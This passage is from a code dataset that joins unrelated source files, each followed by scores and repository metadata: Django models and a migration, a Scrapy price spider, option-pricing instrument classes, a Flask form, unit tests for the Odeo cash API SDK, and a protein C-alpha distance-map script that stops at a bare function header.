(u'neuf', u'neuf'),
(u'bon', u'bon'),
(u'acceptable', u'acceptable'),
(u'mauvais', u'mauvais'),
)
book = models.ForeignKey('Book')
price = models.FloatField()
seller_id = models.PositiveIntegerField()
buyer_id = models.PositiveIntegerField(null=True, blank=True)
posted_date = models.DateTimeField(auto_now_add=True)
sold_date = models.DateTimeField(null=True, blank=True)
annotated = models.BooleanField(default=False)
highlighted = models.BooleanField(default=False)
state = models.CharField(max_length=10, choices=STATE_CHOICES)
comments = models.TextField(blank=True, null=True)
def min_price(self):
return Exemplar.objects.filter(book=self.book).exclude(sold_date=None).aggregate(Min('price'))['price__min']
def state_color(self):
mapping = {
'neuf': 'success',
'bon': 'info',
'acceptable': 'warning',
'mauvais': 'danger'
}
return mapping.get(self.state, 'primary')
class Publisher(models.Model):
name = models.CharField(max_length=255)
def __unicode__(self):
return self.name
class Author(models.Model):
name = models.CharField(max_length=255)
def __unicode__(self):
return self.name
class Section(models.Model):
name = models.CharField(max_length=255)
acronym = models.CharField(max_length=10)
class Semester(models.Model):
name = models.CharField(max_length=255)
acronym = models.CharField(max_length=10)
class UsedBy(models.Model):
book = models.ForeignKey('Book')
section = models.ForeignKey('Section')
semester = models.ForeignKey('Semester')
| 2.15625
| 2
|
portfolio/Python/scrapy/kalahari/takealot.py
|
0--key/lib
| 0
|
12782921
|
import re
import os
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request, HtmlResponse
from scrapy.utils.response import get_base_url
from scrapy.utils.url import urljoin_rfc
from urllib import urlencode
import csv
from product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader
HERE = os.path.abspath(os.path.dirname(__file__))
class TakeALotSpider(BaseSpider):
name = 'takealot.com'
allowed_domains = ['takealot.com']
def start_requests(self):
with open(os.path.join(HERE, 'products.csv')) as f:
reader = csv.DictReader(f)
for row in reader:
sku = row['ProdCode']
url = 'http://www.takealot.com/all/?qsearch=%s&order=price&direction=asc'
yield Request(url % sku, meta={'sku': sku})
def parse(self, response):
hxs = HtmlXPathSelector(response)
product = hxs.select('//li[@class="result-item hproduct"]')
if not product:
return
product = product[0]
loader = ProductLoader(item=Product(), selector=product)
loader.add_xpath('name', './/p[@class="p-title fn"]/a/text()')
url = hxs.select('.//p[@class="p-title fn"]/a/@href').extract()[0]
loader.add_value('url', urljoin_rfc(get_base_url(response), url))
loader.add_xpath('price', './/span[@class="amount"]/text()')
loader.add_value('sku', response.meta['sku'])
yield loader.load_item()
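# Input sketch (assumption): 'products.csv' next to this spider is expected to
# expose at least a 'ProdCode' column, e.g.
#   ProdCode,Description
#   ABC123,Example product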
| 2.703125
| 3
|
common/instruments/instrument.py
|
codestetic/optionworkshop
| 0
|
12782922
|
# -*- coding: utf-8 -*-
from datetime import datetime
import numpy as np
from common.instruments.option_type import *
month_codes = {
1: "F",
2: "G",
3: "H",
4: "J",
5: "K",
6: "M",
7: "N",
8: "Q",
9: "U",
10: "V",
11: "X",
12: "Z"
}
class Instrument:
def __init__(self, code: str, expiration: datetime = None, parent=None):
self.code = code
self.parent = parent
self.expiration = expiration
def tte(self):
if self.expiration is None:
return None
return (self.expiration - datetime.now()).total_seconds() / 365 / 24 / 3600
def __hash__(self):
return hash(self.code)
def __eq__(self, other):
return self.code == other.code
def __ne__(self, other):
return not (self == other)
class Underlying(Instrument):
def __init__(self, code: str, expiration: datetime = None) -> None:
Instrument.__init__(self, code, expiration)
class Equity(Underlying):
def __init__(self, code: str):
Underlying.__init__(self, code)
class Futures(Underlying):
def __init__(self, underlying: Underlying, expiration: datetime):
__code_format__ = "{0}{1}{2}"
self.expiration = expiration
Underlying.__init__(self, __code_format__.format(underlying.code,
month_codes[expiration.month],
expiration.strftime('%y')), expiration)
def __str__(self):
return self.code
class OptionSeries:
def __init__(self, underlying: Underlying, strikes: np.array, expiration: datetime) -> None:
code_format_string = '{0}-{1:%Y%m%d}'
self.strikes = strikes
self.expiration = expiration
self.underlying = underlying
self.code = code_format_string.format(underlying.code, expiration)
self.calls = {}
self.puts = {}
for strike in strikes:
call = Call(self, strike)
put = Put(self, strike)
self.calls[strike] = call
self.puts[strike] = put
def gns(self, underlying_price: float, shift: int = 0):
"""
Get Nearest Strike
Returns strike closest to specified underlying_price. If shift provided,
returns strike with corresponding index shift
:param underlying_price:
"""
closest_index = None
closest_value = None
closest_distance = None
i = 0
for strike in self.strikes:
if closest_index is None:
closest_distance = abs(underlying_price - strike)
closest_index = i
closest_value = strike
elif abs(underlying_price - strike) < closest_distance:
closest_distance = abs(underlying_price - strike)
closest_index = i
closest_value = strike
i = i + 1
return self.strikes[closest_index + shift]
def __str__(self):
return self.code
class Option(Instrument):
code_format_string = '{0}-{3:%Y%m%d}-{1}-{2}'
def __init__(self, series: OptionSeries, strike: float, code: str):
Instrument.__init__(self, code, series.expiration)
self.strike = strike
self.series = series
self.type = None
def __str__(self):
return self.code
class Call(Option):
def __init__(self, series: OptionSeries, strike: float):
Option.__init__(self, series, strike,
Option.code_format_string.format(series.underlying.code, 'C', strike, series.expiration))
self.type = OptionType.CALL
class Put(Option):
def __init__(self, series: OptionSeries, strike: float):
Option.__init__(self, series, strike,
Option.code_format_string.format(series.underlying.code, 'P', strike, series.expiration))
self.type = OptionType.PUT
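# Usage sketch (illustrative, not part of the original module): building a
# small series on a hypothetical futures contract and picking strikes.
if __name__ == '__main__':
    fut = Futures(Underlying('ES'), datetime(2024, 6, 21))
    series = OptionSeries(fut, np.array([90.0, 95.0, 100.0, 105.0]), fut.expiration)
    atm_strike = series.gns(101.3)                        # -> 100.0
    otm_call = series.calls[series.gns(101.3, shift=1)]   # next strike out: 105.0
    print(fut, atm_strike, otm_call)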
| 2.359375
| 2
|
main/migrations/0001_initial.py
|
xn1990/B10
| 0
|
12782923
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-04-29 11:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=50, verbose_name='\u5e10\u53f7')),
('password', models.CharField(max_length=200, verbose_name='\<PASSWORD>')),
('Full_name', models.CharField(max_length=40, null=True, verbose_name='\u59d3\u540d')),
('gender', models.CharField(choices=[('\u7537', '\u7537'), ('\u5973', '\u5973')], max_length=2, null=True, verbose_name='\u6027\u522b')),
('living_address', models.CharField(default=b'\xe5\xb9\xbf\xe4\xb8\x9c\xe6\xb7\xb1\xe5\x9c\xb3', max_length=200, verbose_name='\u4f4f\u5740')),
('email_address', models.EmailField(max_length=254, null=True, verbose_name='\u90ae\u7bb1')),
('identity', models.CharField(choices=[('\u7ba1\u7406\u5458', '\u7ba1\u7406\u5458'), ('\u5de5\u4f5c\u4eba\u5458', '\u5de5\u4f5c\u4eba\u5458'), ('\u5fd7\u613f\u8005', '\u5fd7\u613f\u8005'), ('\u4e50\u961f', '\u4e50\u961f'), ('\u6e38\u5ba2', '\u6e38\u5ba2')], default='\u6e38\u5ba2', max_length=5, verbose_name='\u8eab\u4efd')),
('headImg', models.FileField(default=b'static/upload/default.jpg', upload_to=b'static/upload/')),
('creat_date', models.DateTimeField(auto_now_add=True, verbose_name='\u521b\u5efa\u65f6\u95f4')),
('update_time', models.DateTimeField(auto_now=True, null=True, verbose_name='\u4fee\u6539\u65f6\u95f4')),
],
),
]
| 1.734375
| 2
|
discord/ext/voice_recv/common/__init__.py
|
schlopp/Novus
| 61
|
12782924
|
# -*- coding: utf-8 -*-
from .rtp import *
| 1.09375
| 1
|
webapp/ansible/roles/webapp/files/webapp/app/form.py
|
iganari/hisucon2018
| 4
|
12782925
|
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField
from wtforms.validators import DataRequired
class LoginForm(FlaskForm):
name = StringField('Name', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
    remember_me = BooleanField('Remember password')
    submit = SubmitField('Log in')
| 1.890625
| 2
|
All_Source_Code/GatherData/GatherData_10.py
|
APMonitor/pds
| 11
|
12782926
|
f = open('dx.csv', 'r')
print(f.readline())
print(f.readline())
print(f.readline())
f.close()
| 1.875
| 2
|
tests/cash_service_test_case.py
|
odeoteknologi/odeo-python-sdk
| 0
|
12782927
|
import json
import unittest
import odeo.client
from odeo.exceptions import GeneralError, InputValidationError
from odeo.models.cash import *
from tests.service_test_case import ServiceTestCase
class CashServiceTestCase(ServiceTestCase):
def test_create_bulk_transfers(self):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/bulk-transfer',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'TPGgchibPJopgD2RSgD7H69kT6RimGUZqVhHwgovTrI='
},
text=json.dumps({
'transfers': [{
'transfer_id': '123',
'sender_user_id': '456',
'receiver_user_id': '789',
'amount': 1000000,
'reference_id': 'EXAMPLE-REF-ID-001',
'note': 'Example description',
'created_at': '1612137600'
}],
})
)
self.assertEqual(
[Transfer(
transfer_id='123',
sender_user_id=456,
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001',
note='Example description',
created_at=datetime(2021, 2, 1)
)],
self.client.cash.create_bulk_transfers([
Request(
sender_user_id=456,
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001',
note='Example description'
)
])
)
def test_create_bulk_transfers_with_default_params(self):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/bulk-transfer',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'Oncl5GPNiNlQHi/SKtuWa/HGjyGY7rkQ9jBA+j9aey4='
},
text=json.dumps({
'transfers': [{
'transfer_id': '123',
'sender_user_id': '456',
'receiver_user_id': '789',
'amount': 1000000,
'reference_id': 'EXAMPLE-REF-ID-001',
'created_at': '1612137600'
}],
})
)
self.assertEqual(
[Transfer(
transfer_id='123',
sender_user_id=456,
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001',
created_at=datetime(2021, 2, 1)
)],
self.client.cash.create_bulk_transfers([
Request(
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001'
)
])
)
def test_create_bulk_transfers_failed_amount_out_of_range(self):
self._create_failed_bulk_transfers_test(
InputValidationError,
10001,
'The requests.0.amount must be between 1000 and 1000000'
)
def test_create_bulk_transfers_failed_reference_id_already_used(self):
self._create_failed_bulk_transfers_test(
GeneralError, 10000, 'EXAMPLE-REF-ID-001 reference id exists'
)
def _create_failed_bulk_transfers_test(self, error, error_code, message):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/bulk-transfer',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'Oncl5GPNiNlQHi/SKtuWa/HGjyGY7rkQ9jBA+j9aey4='
},
status_code=400,
text=json.dumps({
'message': message,
'status_code': 400,
'error_code': error_code
})
)
with self.assertRaises(error) as ctx:
self.client.cash.create_bulk_transfers([
Request(
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001'
)
])
self.assertEqual(str(ctx.exception), message)
def test_list_transfers(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/transfers',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'YRHRKTH0L7nFSVGTO3Ng07KKBIys7olErXdtQFLVTio='
},
text=json.dumps({
'transfers': [{
'transfer_id': '123',
'sender_user_id': '456',
'receiver_user_id': '789',
'amount': 1000000,
'reference_id': 'EXAMPLE-REF-ID-001',
'created_at': '1612137600'
}]
})
)
self.assertEqual(
TransfersList(
transfers=[
Transfer(
transfer_id='123',
sender_user_id=456,
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001',
created_at=datetime(2021, 2, 1)
)
],
),
self.client.cash.list_transfers()
)
def test_list_transfers_with_next_page_token(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/transfers',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'YRHRKTH0L7nFSVGTO3Ng07KKBIys7olErXdtQFLVTio='
},
text=json.dumps({
'transfers': [{
'transfer_id': '123',
'sender_user_id': '456',
'receiver_user_id': '789',
'amount': 1000000,
'reference_id': 'EXAMPLE-REF-ID-001',
'created_at': '1612137600'
}],
'next_page_token': 'abcdef'
})
)
self.assertEqual(
TransfersList(
transfers=[
Transfer(
transfer_id='123',
sender_user_id=456,
receiver_user_id=789,
amount=1000000,
reference_id='EXAMPLE-REF-ID-001',
created_at=datetime(2021, 2, 1)
)
],
next_page_token='abcdef'
),
self.client.cash.list_transfers()
)
def test_list_transfers_with_parameters(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/transfers',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '9OFvffcuY/Jxg8wAFhvyidu8dLU9Ga/u5XbQas6e9hA='
},
text=json.dumps({
'transfers': [
{
'transfer_id': '11',
'sender_user_id': '22',
'receiver_user_id': '33',
'amount': 1000000,
'reference_id': 'REF-ID-111',
'created_at': '1612137600'
},
{
'transfer_id': '44',
'sender_user_id': '55',
'receiver_user_id': '66',
'amount': 2000000,
'reference_id': 'REF-ID-222',
'created_at': '1612137600'
}
],
'next_page_token': '<PASSWORD>'
})
)
self.assertEqual(
TransfersList(
transfers=[
Transfer(
transfer_id='11',
sender_user_id=22,
receiver_user_id=33,
amount=1000000,
reference_id='REF-ID-111',
created_at=datetime(2021, 2, 1)
),
Transfer(
transfer_id='44',
sender_user_id=55,
receiver_user_id=66,
amount=2000000,
reference_id='REF-ID-222',
created_at=datetime(2021, 2, 1)
)
],
next_page_token='gh<PASSWORD>'
),
self.client.cash.list_transfers(
['REF-ID-111', 'REF-ID-222'],
start_date=datetime(2021, 2, 1),
end_date=datetime(2021, 4, 3),
page_token='abcdef'
)
)
def test_create_va_topup(self):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '7LtJU4UaR9yUuNzbLww1sYyMEM14ctQCnfp4bTp4++A='
},
text=json.dumps({
'channels': [{
'fee': '5000',
'channel_id': 31,
'pay_code': 'abcdef',
'amount': 1000000,
'total': 1005000
}],
'topup_id': '456',
'expires_at': '1612137600'
})
)
self.assertEqual(
Topup(
channels=[
Channel(
fee=5000,
channel_id=31,
pay_code='abcdef',
amount=1000000,
total=1005000
)
],
topup_id='456',
expires_at=datetime(2021, 2, 1)
),
self.client.cash.create_va_topup(1000000, 123)
)
def test_create_va_topup_failed_minimum_amount(self):
self._create_failed_create_va_topup(
InputValidationError, 10001, 'The amount must be at least 10000'
)
def test_create_va_topup_failed_maximum_amount(self):
self._create_failed_create_va_topup(
InputValidationError, 10001, 'The amount may not be greater than 1000000000000'
)
def test_create_va_topup_failed_sub_user_does_not_exists(self):
self._create_failed_create_va_topup(GeneralError, 10000, 'User not found')
def test_create_va_topup_failed_theres_already_topup_request(self):
self._create_failed_create_va_topup(GeneralError, 10000, 'Pending topup exists')
def _create_failed_create_va_topup(self, error, error_code, message):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '7LtJU4UaR9yUuNzbLww1sYyMEM14ctQCnfp4bTp4++A='
},
text=json.dumps({
'message': message,
'status_code': 400,
'error_code': error_code
})
)
with self.assertRaises(error) as ctx:
self.client.cash.create_va_topup(1000000, 123)
self.assertEqual(str(ctx.exception), message)
def test_find_active_va_topup(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup/active',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '9JcNSUOjeLKP0ENLp671MTl4rYBX55iEtg6Q/V0dNo0='
},
text=json.dumps({
'channels': [{
'fee': '5000',
'channel_id': 31,
'pay_code': 'abcdef',
'amount': 1000000,
'total': 1005000
}],
'topup_id': '456',
'expires_at': '1612137600'
})
)
self.assertEqual(
Topup(
channels=[
Channel(
fee=5000,
channel_id=31,
pay_code='abcdef',
amount=1000000,
total=1005000
)
],
topup_id='456',
expires_at=datetime(2021, 2, 1)
),
self.client.cash.find_active_va_topup()
)
def test_find_active_va_topup_with_user_id_parameter(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup/active',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'rdg9EpRwjKbHPRwos6L1clPGP15w6zHTUOUM+4uUk3A='
},
text=json.dumps({
'channels': [{
'fee': '5000',
'channel_id': 31,
'pay_code': 'abcdef',
'amount': 1000000,
'total': 1005000
}],
'topup_id': '456',
'expires_at': '1612137600'
})
)
self.assertEqual(
Topup(
channels=[
Channel(
fee=5000,
channel_id=31,
pay_code='abcdef',
amount=1000000,
total=1005000
)
],
topup_id='456',
expires_at=datetime(2021, 2, 1)
),
self.client.cash.find_active_va_topup(123)
)
def test_find_active_va_topup_failed_no_active_topup_order(self):
message = 'Order not found'
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup/active',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'rdg9EpRwjKbHPRwos6L1clPGP15w6zHTUOUM+4uUk3A='
},
text=json.dumps({
'message': message,
'status_code': 400,
'error_code': 10000
})
)
with self.assertRaises(GeneralError) as ctx:
self.client.cash.find_active_va_topup(123)
self.assertEqual(str(ctx.exception), message)
def test_cancel_va_topup(self):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup/cancel',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'Xx6lyK8XK7FJmwzQPVLngIMFUaIq4e+cYyue/nw/ET8='
},
text=json.dumps({})
)
self.assertEqual({}, self.client.cash.cancel_va_topup())
def test_cancel_va_topup_with_user_id_parameter(self):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup/cancel',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'D1TXjaSBB5x+sCyzHgqz+hdXK0nu4fN6ClnZsRQYTPE='
},
text=json.dumps({})
)
self.assertEqual({}, self.client.cash.cancel_va_topup(123))
def test_cancel_va_topup_failed_no_active_topup_order(self):
self._create_failed_cancel_va_topup(GeneralError, 10000, 'Order not found')
def test_cancel_va_topup_failed_sub_user_does_not_exists(self):
self._create_failed_cancel_va_topup(GeneralError, 10000, 'User not found')
def test_cancel_va_topup_failed_not_the_order_owner(self):
self._create_failed_cancel_va_topup(
GeneralError, 10000, "You don't have credential to access this data."
)
def test_cancel_va_topup_failed_order_already_confirmed(self):
self._create_failed_cancel_va_topup(GeneralError, 10000, "Can't cancel this order.")
def _create_failed_cancel_va_topup(self, error, error_code, message):
self.adapter.register_uri(
'POST',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/va-topup/cancel',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Content-Type': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'D1TXjaSBB5x+sCyzHgqz+hdXK0nu4fN6ClnZsRQYTPE='
},
status_code=400,
text=json.dumps({
'message': message,
'status_code': 400,
'error_code': error_code
})
)
with self.assertRaises(error) as ctx:
self.client.cash.cancel_va_topup(123)
self.assertEqual(str(ctx.exception), message)
def test_get_balance(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/me/balance',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'ms3Xm918ZnQ8rayEjAvnV86uKTxQLqFv/7M6F+SJ1kk='
},
text=json.dumps({
'cash': {
'amount': 1000000,
'currency': 'IDR',
'formatted_amount': 'Rp1,000,000'
},
'locked_cash': {
'amount': 100000,
'currency': 'IDR',
'formatted_amount': 'Rp100,000'
}
})
)
self.assertEqual(
Balance(
cash=Cash(1000000, 'IDR', 'Rp1,000,000'),
locked_cash=Cash(100000, 'IDR', 'Rp100,000')
),
self.client.cash.get_balance()
)
def test_get_balance_with_user_id_parameter(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/123/balance',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '8ek7fHgiGmYXUDRO/7ygi2enSnxrAwEvEUDo13AJQJ8='
},
text=json.dumps({
'cash': {
'amount': 1000000,
'currency': 'IDR',
'formatted_amount': 'Rp1,000,000'
},
'locked_cash': {
'amount': 100000,
'currency': 'IDR',
'formatted_amount': 'Rp100,000'
}
})
)
self.assertEqual(
Balance(
cash=Cash(1000000, 'IDR', 'Rp1,000,000'),
locked_cash=Cash(100000, 'IDR', 'Rp100,000')
),
self.client.cash.get_balance(123)
)
def test_get_balance_failed_user_does_not_exists(self):
message = ''
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/123/balance',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': '8ek7fHgiGmYXUDRO/7ygi2enSnxrAwEvEUDo13AJQJ8='
},
text=json.dumps({
'message': message,
'status_code': 400,
'error_code': 10000
})
)
with self.assertRaises(GeneralError) as ctx:
self.client.cash.get_balance(123)
self.assertEqual(str(ctx.exception), message)
def test_get_transactions_history(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/transactions',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'mDAKk7c//3X7r4X6Q/G0EtlY0fq0Ix7xQG2Gn4oI/A4='
},
text=json.dumps({
'cash_transactions': [{
'cash_transaction_id': '123',
'user_id': '456',
'amount': 1000000,
'balance_before': 1000000,
'balance_after': 2000000,
'transaction_type': 'api_disbursement',
'created_at': '1612137600'
}],
'next_page_token': 'abcdef'
})
)
self.assertEqual(
TransactionsHistory(
cash_transactions=[
CashTransaction(
cash_transaction_id='123',
user_id='456',
amount=1000000,
balance_before=1000000,
balance_after=2000000,
transaction_type='api_disbursement',
created_at=datetime(2021, 2, 1)
)
],
next_page_token='abcdef'
),
self.client.cash.get_transactions_history()
)
def test_get_transactions_history_with_parameters(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/transactions',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'cONLC0e0B/lAd7k0NV3TP7gOHTAAR5O5VzX7O8hUf5k='
},
text=json.dumps({
'cash_transactions': [{
'cash_transaction_id': '123',
'user_id': '456',
'amount': 1000000,
'balance_before': 1000000,
'balance_after': 2000000,
'transaction_type': 'api_disbursement',
'created_at': '1612137600'
}],
'next_page_token': 'abcdef'
})
)
self.assertEqual(
TransactionsHistory(
cash_transactions=[
CashTransaction(
cash_transaction_id='123',
user_id='456',
amount=1000000,
balance_before=1000000,
balance_after=2000000,
transaction_type='api_disbursement',
created_at=datetime(2021, 2, 1)
)
],
next_page_token='abcdef'
),
self.client.cash.get_transactions_history(
start_date=datetime(2021, 2, 1),
end_date=datetime(2021, 4, 3),
page_token='ghijkl'
)
)
def test_get_sub_user_transactions_history(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/sub-user-transactions',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
                'X-Odeo-Signature': '<KEY>'
},
text=json.dumps({
'cash_transactions': [
{
'cash_transaction_id': '111',
'user_id': '456',
'amount': 1000000,
'balance_before': 1000000,
'balance_after': 2000000,
'transaction_type': 'api_disbursement',
'created_at': '1612137600'
},
{
'cash_transaction_id': '222',
'user_id': '789',
'amount': 3000000,
'balance_before': 3000000,
'balance_after': 4000000,
'transaction_type': 'api_disbursement',
'created_at': '1617408000'
}
],
'next_page_token': 'abcdef'
})
)
self.assertEqual(
TransactionsHistory(
cash_transactions=[
CashTransaction(
cash_transaction_id='111',
user_id='456',
amount=1000000,
balance_before=1000000,
balance_after=2000000,
transaction_type='api_disbursement',
created_at=datetime(2021, 2, 1)
),
CashTransaction(
cash_transaction_id='222',
user_id='789',
amount=3000000,
balance_before=3000000,
balance_after=4000000,
transaction_type='api_disbursement',
created_at=datetime(2021, 4, 3)
)
],
next_page_token='abcdef'
),
self.client.cash.get_transactions_history([456, 789])
)
def test_get_sub_user_transactions_history_with_parameters(self):
self.adapter.register_uri(
'GET',
odeo.client.DEVELOPMENT_BASE_URL + '/cash/sub-user-transactions',
request_headers={
'Authorization': 'Bearer ' + self.access_token,
'Accept': 'application/json',
'X-Odeo-Timestamp': '1612137600',
'X-Odeo-Signature': 'kFIBW9qN5Z3IKUR1blmXIwxgdluIPLffCw3Kz5sWSKU='
},
text=json.dumps({
'cash_transactions': [
{
'cash_transaction_id': '111',
'user_id': '456',
'amount': 1000000,
'balance_before': 1000000,
'balance_after': 2000000,
'transaction_type': 'api_disbursement',
'created_at': '1612137600'
},
{
'cash_transaction_id': '222',
'user_id': '789',
'amount': 3000000,
'balance_before': 3000000,
'balance_after': 4000000,
'transaction_type': 'api_disbursement',
'created_at': '1617408000'
}
],
'next_page_token': 'abcdef'
})
)
self.assertEqual(
TransactionsHistory(
cash_transactions=[
CashTransaction(
cash_transaction_id='111',
user_id='456',
amount=1000000,
balance_before=1000000,
balance_after=2000000,
transaction_type='api_disbursement',
created_at=datetime(2021, 2, 1)
),
CashTransaction(
cash_transaction_id='222',
user_id='789',
amount=3000000,
balance_before=3000000,
balance_after=4000000,
transaction_type='api_disbursement',
created_at=datetime(2021, 4, 3)
)
],
next_page_token='abcdef'
),
self.client.cash.get_transactions_history(
user_ids=[456, 789],
start_date=datetime(2021, 2, 1),
end_date=datetime(2021, 4, 3),
page_token='ghijkl'
)
)
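# The X-Odeo-Signature values asserted above look like base64-encoded
# HMAC-SHA256 digests. The exact string-to-sign is internal to the SDK and is
# not shown in this file; the sketch below only illustrates that general shape
# (the secret and message here are placeholders, not real credentials).
import base64
import hashlib
import hmac
def example_signature(secret: bytes, string_to_sign: bytes) -> str:
    digest = hmac.new(secret, string_to_sign, hashlib.sha256).digest()
    return base64.b64encode(digest).decode()
# e.g. example_signature(b'secret', b'GET:/cash/me/balance:1612137600')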
if __name__ == '__main__':
unittest.main()
| 2.546875
| 3
|
scripts/python_lib/calpha_distance_map.py
|
sambitmishra0628/PSP-GNM
| 0
|
12782928
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 1 16:33:02 2018
@author: <NAME>
"""
# Calculate the distance map between the C-alpha atoms in a protein. The input
# file is required to be a C_alpha coordinate file
import sys
import re
import numpy as np
import matplotlib.pyplot as plt
def get_ca_coordinates (filename):
    # Parse the C-alpha coordinates from a PDB-format coordinate file given by
    # filename; each ATOM record contributes one (x, y, z) triple.
fh = open(filename, 'r')
all_coords = []; # create a multi-dimensional array to store the coordinates
for line_i in fh:
        if re.match(r'^\s*$', line_i):
pass
elif re.match('^ATOM', line_i):
line_i = line_i.rstrip()
coords_i = line_i[26:54]
coords_i = coords_i.split() # split by white space into individual elements
# convert into integers
coords_i = list(map(float,coords_i)) # convert from string to numeric
all_coords.append(coords_i)
fh.close()
# convert the multi-dimensional array into numpy array
all_coords_ca = np.array(all_coords)
return all_coords_ca
def calculate_ca_dist(ca_coords):
# calculate c-alpha distances
nres = len(ca_coords)
    dist_mat = np.zeros((nres, nres), dtype=float)  # nres x nres zero matrix to store the pairwise distances
for i in range(0,nres-1):
for j in range(i+1,nres):
            diff_ij = ca_coords[i,:]-ca_coords[j,:]
r_ij = np.linalg.norm(diff_ij)
dist_mat[i,j] = r_ij
dist_mat[j,i] = r_ij
return dist_mat
# The main script which will invoke the functions
filename = sys.argv[1]
all_coords_ca = get_ca_coordinates(filename)
dist_mat = calculate_ca_dist(all_coords_ca)
plt.figure()
plt.imshow(dist_mat, cmap='jet')
plt.show()
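# A vectorized sketch of the same computation (an illustrative alternative to
# the double loop above): broadcasting yields all pairwise differences at once.
def calculate_ca_dist_vectorized(ca_coords):
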